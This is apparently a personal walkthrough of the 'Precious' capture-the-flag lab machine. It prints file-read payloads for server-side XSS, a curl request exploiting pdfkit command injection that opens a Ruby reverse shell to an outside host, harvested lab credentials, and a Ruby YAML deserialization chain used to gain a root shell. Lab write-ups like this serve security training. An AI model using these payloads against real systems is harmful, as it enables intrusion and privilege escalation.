Precious

Personal Rating: Medium

Enumeration

sudo nmap -sV <IP>

• Only ssh and port 80 open

• There is a page where you are supposed to enter an URL and get it converted to PDF

• nginx and Phusion Passenger 6.0.15

• Subdomain Scan, dirscan and Vhost scan revealed nothing at all

On the web page, when I fetch a html page that I created and host on my machine, I get a PDF file as output. I will try to include files with Javascript.

I created a test js file. A PDF with this content to check the injection:

<!DOCTYPE html>
<html>
  <body>
    <div id="main">The JS was not executed</div>
  </body>
  <script>
    div = document.getElementById('main');
    div.innerHTML = "The JS was executed";
  </script>
</html>

Server Side XSS?

The vulnerability is a Server Side XSS, as you can make a web handler execute code, but not in the browser of a user that accesses the website for instance, but on the server itself. I found a list of LFI payloads to test:

<!DOCTYPE html>
<html>
  <body>
    <script>
      x=new XMLHttpRequest;
      x.onload=function(){document.write(btoa(this.responseText))};
      x.open("GET","file:///etc/passwd");x.send();
    </script>
    <script>
      xhzeem = new XMLHttpRequest();
      xhzeem.onload = function(){document.write(this.responseText);}
      xhzeem.onerror = function(){document.write('failed!')}
      xhzeem.open("GET","file:///etc/passwd");
      xhzeem.send();
    </script>
    <iframe src=file:///etc/passwd></iframe>
    <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
    <link rel=attachment href="file:///root/secret.txt">
    <object data="file:///etc/passwd">
    <portal src="file:///etc/passwd" id=portal>
  </body>
</html>

I am loading this with http://10.10.16.7:8000/test.html

This seems to make the server not output a PDF anymore, so I removed it:

<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

The script collection above actually returned nothing when sending it to the server.

Exifdata pdfkit Exploit Reveal

I checked the result PDF with exiftool and found out that it uses a vulnerable pdfkit version. This is not the way that I expected. I saw that it is important to test and enumerate broadly before trying for too long on an exploit path that does not work.

The version of exiftool is vulnerable to a ruby code injection. https://www.ctfiot.com/84447.html

This was the command that did the exploit:

curl 'http://precious.htb/'
-X POST
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0'
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8'
-H 'Accept-Language: en-US,en;q=0.5'
-H 'Accept-Encoding: gzip, deflate'
-H 'Content-Type: application/x-www-form-urlencoded'
-H 'Origin: http://precious.htb/'
-H 'Connection: keep-alive'
-H 'Referer: http://precious.htb/'
-H 'Upgrade-Insecure-Requests: 1'
--data-raw 'url=http%3A%2F%2F10.10.16.7%3A8000%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%2210.10.16.7%22%2C4444%29%29%27%60'
--output soos.txt

I got a shell with that actually.

With this I could upgrade it to a real tty:

python3 -c 'import pty; pty.spawn("/bin/bash")'

There is the user “henry”. I cannot read the user.txt yet as I am the ruby user.

Internal Enumeration

I ran linPEASS:

- Potentially Vulnerable to CVE-2022-0847
- Potentially Vulnerable to CVE-2022-2588
- CVE-2022-0847
NOPE - sudo version?
NOPE - /etc/nginx/sites-enabled/pdfapp.conf
NOPE - /usr/share/openssh/sshd_config
NOPE- /var/log/nginx/access.log
NOPE- /var/log/nginx/error.log
- /opt/sample
- ╔══════════╣ Executable files potentially added by user (limit 70)
2022-11-21+15:15:08.0729708500 /usr/local/sbin/laurel
2022-09-26+05:04:43.6880195170 /home/ruby/.bundle/config
2022-09-26+05:04:42.9800195060 /usr/local/bin/tilt
2022-09-26+05:04:42.8480195040 /usr/local/bin/rackup
2022-09-26+05:04:39.0520194460 /usr/local/bin/bundler
2022-09-26+05:04:39.0520194460 /usr/local/bin/bundle
NOPE - /tmp/passenger.YarIXDw/full_admin_password.txt
NOPE - /tmp/passenger.YarIXDw/read_only_admin_password.txt
<SNIP>

I got the creds henry:Q3c1AqGHtoI0aXAYFH from /home/ruby/.bundle/config

With that I could ssh on to the host

Ruby SUID Dependency Update Exploit

With sudo -l I found an suid binary: (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

After changing the PATH to include /home/henry and creating a file called dependencies.yml in it, I looked at the update deps file. It uses YAML.load(File.read... This is apparently vulnerable to a deserialization, which can lead to code execution. I had to peek at the writeup for this as I got stuck.

Universal RCE with Ruby YAML.load - Staaldraad

I put this in the dependencies.yml:

--- !ruby/object:Gem::Requirement
requirements:
  !ruby/object:Gem::DependencyList
  specs:
  - !ruby/object:Gem::Source::SpecificFile
    spec: &1 !ruby/object:Gem::StubSpecification
      loaded_from: "/root/root.txt"
  - !ruby/object:Gem::Source::SpecificFile
      spec:

I wanted a shell as root, so I researched further

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/Ruby.md

In the end, this payload worked to get a root shell:

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: /bin/bash
         method_id: :resolve